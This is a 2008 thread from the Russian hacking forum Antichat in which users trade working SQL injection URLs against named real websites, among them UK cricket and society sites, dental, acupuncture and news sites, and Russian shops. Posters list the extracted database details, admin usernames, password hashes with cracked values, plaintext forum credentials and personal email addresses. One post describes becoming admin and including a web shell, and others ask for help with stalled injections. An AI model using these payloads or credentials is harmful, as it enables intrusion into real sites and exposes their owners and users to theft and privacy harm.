Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.09.2008, 14:39
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.knockers.org.uk/players.php?id=118+order+by+8--
Dbname:mycricket
Version:5.0.51a-community-log
User:lcs34@tango.rb.xcalibre.co.uk
========================================
http://www.sherlock-holmes.org.uk/event_info.php?id=141|SQL
DBname:sherlock_holmes
Version:4.1.22-standard
User:sherlock_general@localhost
Последний раз редактировалось $n@ke; 09.09.2008 в 18:40..
|
|
|
10.09.2008, 10:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
http://www.aavba.org/
Скуль:
http://www.aavba.org/articles.php?Id=-1+union+select+1,USERNAME,password,4,5,6,7+from+us ers+limit+1,1/*
Логин: VBSLLC
хеш: 5b5f366f63b42b17
Расшифровка хеша: noodles1
user() - aavba@localhost
version() - 5.0.22
database() - aavba
В админке есть какая то биллинг панель, на счету 99 $, также на сколько я понял сайт
http://virtualbankruptcyservices.net
принадлежит этому же админу...
В общем, если кто дальше нароет, отпишитесь плиз!
И еще чуток разношерстных скулей:
http://www.sufficiencyeconomy.org/show.php?Id=-1+union+select+1,2,3,4,5,version(),7,user(),9,10,1 1,12,13,14,15/*
http://www.heizoel24.de/news.php?news_id=-1+union+select+1,user(),3,version(),database(),6/*
http://www.awrrtc.org/articles.php?id=-1+union+select+1,user(),version(),database(),5/*
http://www.sibezrcs.ru/articles.php?id=-1+union+select+1,user(),version(),4,database(),6,7 ,8,9,10,11/*
http://www.ladogorski.com/articles.php?id=-1+union+select+1,user(),version(),4,5,6,7/*
http://www.gloriahansen.com/articles.php?p=1&ID=-1+union+select+1,version(),3,user(),database(),6,7--
http://www.lynnmaloneyacupuncture.com/articles.php?ID=-1+union+select+1,2,version(),user()/*
http://www.4gr8teeth.com/articles.php?id=-1+union+select+1,user(),3,version()--
Последний раз редактировалось Twoster; 10.09.2008 в 12:15..
|
|
|
|
10.09.2008, 12:42
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.sensation.org.uk/index.php?p=10
Dbname: sensa_cms
Version: 4.1.22-standard
Username: sensa_website@localhost
password:username
test:alan@mtcmedia.co.uk
test:gordonkennovin@cxrbiosciences.com
test2:markchamberlain@cxrbiosciences.com
|
|
|
|
10.09.2008, 14:08
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
PageRank: 5 тИЦ: 110
http://www.amadeo-russia.ru/brand/?brand=-1+union+select+1,table_name,concat_ws(0x2f,version (),user(),database()),4,5,6/*
(вывод в титле)
интересные таблы:
ws_users
ws_users2
bof_users
cmf_users
chat_users
invforumapi_users
invforummeetings_user
users
админки я так и не нашел, скорее всего ее нету 
Последний раз редактировалось AkyHa_MaTaTa; 10.09.2008 в 15:29..
Причина: обшибся
|
|
|
|
10.09.2008, 14:41
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
И еще маленько:
http://www.theallergygroup.com/articles.php?id=-1+union+select+1,user(),3,version()/*
http://www.joelegecko.com/articles.php?id=-1+union+select+1,version(),user(),4,database(),6,7 ,8,9,10,11,12,13/*
http://profootballfocus.com/articles.php?tab=articles&arc=&id=-1+union+select+1,admin,password,4,5,6,7+from+membe rs--
(в поле admin выводит 0, выводит хеш пароля, но админку не нашел...)
http://www.u-coc.com/articles.php?id=-1+union+select+1,2,version(),database()/*
|
|
|
|
10.09.2008, 14:47
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
ппц как жрать охота..вот замена небольшая))
http://euclid.hamline.edu/~arundquist/php/mysql/movies/showmovie.php?movie_id=279
Name: test
Version: 4.1.22-log
Username: arundquist@localhost
ADD
============================================
http://www.celtnet.org.uk/mobile-phone/rt_readarticle.php?id=-1+union+select+username,password,3,email+from+user s/*
Database name: celtnet
Version: 4.1.19-standard-log
Username: celtnet@localhost
там пхпбб2 есть,но не будем тянуть хеши оттуда, так как логин и пасс покатят, и О ЧУДО, юзер окажецца админом....далее инклудим шелл и...а там кто что сможет)) при свежей BSDe (((
зы: куча команд отключена. советую попробовать include, ибо через passthru половина команд не досступна.(pwd катит).
Последний раз редактировалось $n@ke; 10.09.2008 в 19:05..
|
|
|
|
11.09.2008, 03:52
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://taro.in.ua/index.php?page=subarticle&id=-1+union+select+1,2,3,concat_ws(0x3a3a,username,pas sword),5,6,7,8+from+f_users/*
http://taro.in.ua/forum
login: Филиса <-модер
pass: draco
|
|
|
|
11.09.2008, 16:48
|
|
Новичок
Регистрация: 05.09.2008
Сообщений: 3
Провел на форуме:
68503
Репутация:
0
|
|
http://www.diza.in/pages/?id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3/*
4.1.22-log:intelco1_intelcom:intelco1_maxanda@localhos
Помогите узнать нвзвания таблиц  ужо запарилсо... |
|
|
|
11.09.2008, 18:05
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
есть 100% инъекция:
http://www.product.ru/debetorShow.asp?IdDeb=20
http://www.product.ru/debetorShow.asp?IdDeb=21-1
НО union не проходит, IF не проходит, кто надет продолжение +10 в репу.
|
|
|
|
11.09.2008, 18:16
|
|
Участник форума
Регистрация: 26.11.2007
Сообщений: 266
Провел на форуме:
3412198
Репутация:
341
|
|
http://www.michaelpollan.com/article.php?id=-80+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5,6,7,8,9,10/*
4.1.22-standard/pollan_article@localhost/pollan_articles
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Dezzter]](/avatars/avatar45529.gif){kind=avatar}
Похожие темы
Линейный вид
